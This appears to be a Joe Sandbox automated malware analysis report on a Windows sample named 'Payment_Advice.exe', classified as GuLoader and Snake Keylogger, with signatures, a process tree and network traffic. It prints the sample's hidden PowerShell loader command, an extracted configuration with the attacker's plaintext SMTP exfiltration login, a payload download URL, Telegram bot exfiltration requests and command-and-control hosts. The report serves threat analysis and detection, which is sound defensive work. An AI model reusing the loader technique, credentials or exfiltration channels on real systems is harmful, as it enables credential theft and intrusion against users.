Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_Advice.exe

Overview

General Information

Sample name:Payment_Advice.exe
Analysis ID:1481503
MD5:0347f8c12b5bb537bdbeca759b4c67f4
SHA1:db7617a367383cde0ae94564f5b2484692554a88
SHA256:e67c6018e32d7e2f598cf535fb6977c012cfa4fba14a21b4884adf405d3faeb0
Tags:exesigned
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Powershell creates an autostart link
Powershell drops PE file
Sample is not signed and drops a device driver
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Payment_Advice.exe (PID: 1680 cmdline: "C:\Users\user\Desktop\Payment_Advice.exe" MD5: 0347F8C12B5BB537BDBECA759B4C67F4)
    • powershell.exe (PID: 5884 cmdline: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wab.exe (PID: 6752 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "mario@electromac.com.bo", "Password": "Amor1950narciso", "Host": "mail.electromac.com.bo", "Port": "587"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000002.00000002.2439089411.0000000009D91000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: wab.exe PID: 6752JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: wab.exe PID: 6752JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", CommandLine: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 1680, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", ProcessId: 5884, ProcessName: powershell.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.185.142.133, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 6752, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49731
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", CommandLine: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment_Advice.exe", ParentImage: C:\Users\user\Desktop\Payment_Advice.exe, ParentProcessId: 1680, ParentProcessName: Payment_Advice.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", ProcessId: 5884, ProcessName: powershell.exe
            No Snort rule has matched
            Timestamp:2024-07-25T10:19:19.577126+0200
            SID:2803270
            Source Port:49713
            Destination Port:443
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T10:19:36.426172+0200
            SID:2022930
            Source Port:443
            Destination Port:49722
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T10:19:25.097389+0200
            SID:2803274
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T10:19:25.702498+0200
            SID:2803305
            Source Port:49716
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-25T10:18:58.312180+0200
            SID:2022930
            Source Port:443
            Destination Port:49706
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-25T10:19:36.216211+0200
            SID:2803305
            Source Port:49723
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-25T10:19:28.159918+0200
            SID:2803274
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-25T10:19:22.456763+0200
            SID:2803274
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: malware
            Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: malware
            Source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mario@electromac.com.bo", "Password": "Amor1950narciso", "Host": "mail.electromac.com.bo", "Port": "587"}
            Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exeReversingLabs: Detection: 34%
            Source: Payment_Advice.exeReversingLabs: Detection: 34%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Payment_Advice.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49730 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdbu source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: aqm.Core.pdbh source: powershell.exe, 00000002.00000002.2435366329.00000000076DC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl] source: powershell.exe, 00000002.00000002.2435366329.0000000007645000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbB396-481F-9042-AD358843EC24c source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 028BF2EDh5_2_028BF12B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 028BFAA9h5_2_028BF804
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 028BF2EDh5_2_028BF33C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 24492C21h5_2_24492970
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 244931E8h5_2_24492DD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_24490040
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449E311h5_2_2449E068
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449DEB9h5_2_2449DC10
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449E769h5_2_2449E4C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449F019h5_2_2449ED70
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449EBC1h5_2_2449E918
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 244931E8h5_2_24493116
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449F471h5_2_2449F1C8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 244931E8h5_2_24492DC7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449FD21h5_2_2449FA78
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449F8C9h5_2_2449F620
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449D609h5_2_2449D360
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449D1B1h5_2_2449CF08
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 24490D0Dh5_2_24490B30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 24491697h5_2_24490B30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4x nop then jmp 2449DA61h5_2_2449D7B8

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /wp-includes/QMHHyMk225.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /wp-includes/QMHHyMk225.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: www.reap.skyestates.com.mt
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: mail.electromac.com.bo
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 08:19:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000002.00000002.2435366329.0000000007679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://electromac.com.bo
            Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.electromac.com.bo
            Source: Payment_Advice.exe, Payment_Advice.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r10.i.lencr.org/01
            Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r10.o.lencr.org0#
            Source: Payment_Advice.exe, Payment_Advice.exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: Payment_Advice.exe, Payment_Advice.exe.2.drString found in binary or memory: http://s.symcd.com06
            Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Payment_Advice.exe, Payment_Advice.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: Payment_Advice.exe, Payment_Advice.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: Payment_Advice.exe, Payment_Advice.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a
